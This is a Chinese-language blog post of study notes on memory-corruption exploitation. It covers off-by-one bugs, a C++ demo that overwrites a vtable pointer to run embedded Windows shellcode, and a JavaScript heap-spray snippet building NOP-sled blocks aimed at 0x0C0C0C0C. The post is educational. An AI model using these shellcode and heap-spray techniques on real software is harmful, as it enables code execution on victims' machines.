<h1 id="“off-by-one”的利用"><a href="#“off-by-one”的利用" class="headerlink" title="“off by one”的利用"></a>“off by one”的利用</h1><p>Halvar Flake 在“Third Generation Exploitation”中，按照攻击的难度把漏洞利用技术分成3个层次。<br>（1）第一类是基础的栈溢出利用。攻击者可以利用返回地址等轻松劫持进程，植入shellcode，例如，对strcpy、strcat 等函数的攻击等。</p>
<p>（2）第二类是高级的栈溢出利用。这时，栈中有诸多的限制因素，溢出数据往往只能淹没部分的EBP，而无法抵达返回地址的位置。因此，直接淹没返回地址获得EIP 的控制权是不可能的。这种漏洞利用的典型例子就是对strncpy 函数误用时产生的“off by one”漏洞的利用。</p>
<p>（3）第三类攻击则是堆溢出利用及格式化串漏洞的利用.</p>
<h1 id="攻击C-的虚函数"><a href="#攻击C-的虚函数" class="headerlink" title="攻击C++的虚函数"></a>攻击C++的虚函数</h1><p>简单地把虚函数和虚表理解为以下几个要点。<br>（1）C++类的成员函数在声明时，若使用关键字virtual 进行修饰，则被称为虚函数。<br>（2）一个类中可能有很多个虚函数。<br>（3）虚函数的入口地址被统一保存在虚表（Vtable）中。<br>（4）对象在使用虚函数时，先通过虚表指针找到虚表，然后从虚表中取出最终的函数入口地址进行调用。<br>（5）虚表指针保存在对象的内存空间中，紧接着虚表指针的是其他成员变量。<br>（6）虚函数只有通过对象指针的引用才能显示出其动态调用的特性。</p>
<p>如果对象中的成员变量发生了溢出，有机会修改对象中的虚表指针或修改虚表中的虚函数指针，那么在程序调用虚函数时就会跑去执行shellcode。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">#include &quot;windows.h&quot;</span><br><span class="line">#include &quot;iostream.h&quot;</span><br><span class="line">char shellcode[]=</span><br><span class="line">&quot;\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C&quot;</span><br><span class="line">&quot;\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53&quot;</span><br><span class="line">&quot;\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B&quot;</span><br><span class="line">&quot;\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95&quot;</span><br><span class="line">&quot;\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59&quot;</span><br><span class="line">&quot;\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A&quot;</span><br><span class="line">&quot;\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75&quot;</span><br><span class="line">&quot;\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03&quot;</span><br><span class="line">&quot;\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB&quot;</span><br><span class="line">&quot;\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50&quot;</span><br><span class="line">&quot;\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90&quot;</span><br><span class="line">&quot;\x1C\x88\x40\x00&quot;;//set fake virtual function pointer</span><br><span class="line">class Failwest</span><br><span class="line">&#123;</span><br><span class="line">public:</span><br><span class="line">char buf[200];</span><br><span class="line">virtual void test(void)</span><br><span class="line">&#123;</span><br><span class="line">cout&lt;&lt;&quot;Class Vtable::test()&quot;&lt;&lt;endl;</span><br><span class="line">&#125;</span><br><span class="line">&#125;;</span><br><span class="line">Failwest overflow, *p;</span><br><span class="line">void main(void)</span><br><span class="line">&#123;</span><br><span class="line">char * p_vtable;</span><br><span class="line">p_vtable=overflow.buf-4;//point to virtual table</span><br><span class="line">//reset fake virtual table to 0x004088cc</span><br><span class="line">//the address may need to ajusted via runtime debug</span><br><span class="line">p_vtable[0]=0xCC;</span><br><span class="line">p_vtable[1]=0x88;</span><br><span class="line">p_vtable[2]=0x40;</span><br><span class="line">p_vtable[3]=0x00;</span><br><span class="line">strcpy(overflow.buf,shellcode);//set fake virtual function</span><br><span class="line">pointer</span><br><span class="line">p=&amp;overflow;</span><br><span class="line">p-&gt;test();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>对这段程序需要说明如下。<br>（1）虚表指针位于成员变量char buf[200]之前，程序中通过p_vtable=overflow.buf-4 定位到这个指针。</p>
<p>（2）修改虚表指针指向缓冲区的0x004088CC 处。<br>（3）程序执行到p-&gt;test()时，将按照伪造的虚函数指针去0x004088CC 寻找虚表，这里正好是缓冲区里shellcode 的末尾。在这里填上shellcode 的起始位置0x0040881C 作为伪造的虚函数入口地址，程序将最终跳去执行shellcode</p>
<p><img src="11.png" alt=""><br>由于虚表指针位于成员变量之前，溢出只能向后覆盖数据，所以很可惜这种利用方式在“栈溢出”场景下有一定局限</p>
<p>对于DWORD SHOOT 的利用场景，攻击虚函数会更容易些。修改虚表指针或直接修改虚函数指针都是不错的选择。</p>
<h1 id="Heap-Spray：堆与栈的协同攻击"><a href="#Heap-Spray：堆与栈的协同攻击" class="headerlink" title="Heap Spray：堆与栈的协同攻击"></a>Heap Spray：堆与栈的协同攻击</h1><p>（1）当浏览器或其使用的ActiveX 控件中存在溢出漏洞时，攻击者就可以生成一个特殊的HTML文件来触发这个漏洞。<br>（2）不管是堆溢出还是栈溢出，漏洞触发后最终能够获得EIP。<br>（3）有时我们可能很难在浏览器中复杂的内存环境下布置完整的shellcode。<br>（4）页面中的JavaScript 可以申请堆内存，因此，把shellcode 通过JavaScript 布置在堆中成为可能。<br>在使用Heap Spray 的时候，一般会将EIP 指向堆区的0x0C0C0C0C 位置，然后用JavaScript申请大量堆内存，并用包含着0x90 和shellcode 的“内存片”覆盖这些内存。</p>
<p>通常，JavaScript 会从内存低址向高址分配内存，因此申请的内存超过200MB（200MB=200×1024×1024 = 0x0C800000 &gt; 0x0C0C0C0C）后，0x0C0C0C0C 将被含有shellcode 的内存片覆盖。只要内存片中的0x90 能够命中0x0C0C0C0C 的位置，shellcode 就能最终得到执行</p>
<p><img src="12.png" alt=""><br>可以用类似下面这样的JavaScript 产生的内存片来覆盖内存。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">var nop=unescape(&quot;%u9090%u9090&quot;);</span><br><span class="line">while (nop.length&lt;= 0x100000/2)</span><br><span class="line">&#123;</span><br><span class="line">nop+=nop;</span><br><span class="line">&#125;//生成一个1MB 大小充满0x90 的数据块</span><br><span class="line">nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 );</span><br><span class="line">var slide = new Arrary();</span><br><span class="line">for (var i=0; i&lt;200; i++)</span><br><span class="line">&#123;</span><br><span class="line">slide[i] = nop + shellcode</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>对于这段JavaScript 需要解释如下。<br>（1）每个内存片大小为1MB。<br>（2）首先产生一个大小为1MB 且全部被0x90 填满的内存块。<br>（3）由于Java 会为申请到的内存填上一些额外的信息，为了保证内存片恰好是1MB，我们将这些额外信息所占的空间减去。</p>
<p>（4）如图所示，最终我们将使用200 个这种形式的内存片来覆盖堆内存，只要其中任意一片的nop 区能够覆盖0x0C0C0C0C，攻击就可以成功。</p>
<p><img src="13.png" alt=""></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/0day安全/" rel="tag"># 0day安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/02/堆溢出利用/" rel="next" title="堆溢出利用">
                <i class="fa fa-chevron-left"></i> 堆溢出利用
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/12/手脱Yoda-s-Protector/" rel="prev" title="手脱Yoda's Protector">
                手脱Yoda's Protector <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">loser</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">51</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#狙击Windows-异常处理机制"><span class="nav-number">1.</span> <span class="nav-text">狙击Windows 异常处理机制</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#S-E-H-概述"><span class="nav-number">1.1.</span> <span class="nav-text">S.E.H 概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#在栈溢出中利用S-E-H"><span class="nav-number">1.2.</span> <span class="nav-text">在栈溢出中利用S.E.H</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#在堆溢出中利用S-E-H"><span class="nav-number">1.3.</span> <span class="nav-text">在堆溢出中利用S.E.H</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#深入挖掘Windows-异常处理"><span class="nav-number">1.4.</span> <span class="nav-text">深入挖掘Windows 异常处理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#其他异常处理机制的利用思路"><span class="nav-number">1.5.</span> <span class="nav-text">其他异常处理机制的利用思路</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#“off-by-one”的利用"><span class="nav-number">2.</span> <span class="nav-text">“off by one”的利用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#攻击C-的虚函数"><span class="nav-number">3.</span> <span class="nav-text">攻击C++的虚函数</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Heap-Spray：堆与栈的协同攻击"><span class="nav-number">4.</span> <span class="nav-text">Heap Spray：堆与栈的协同攻击</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">loser</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
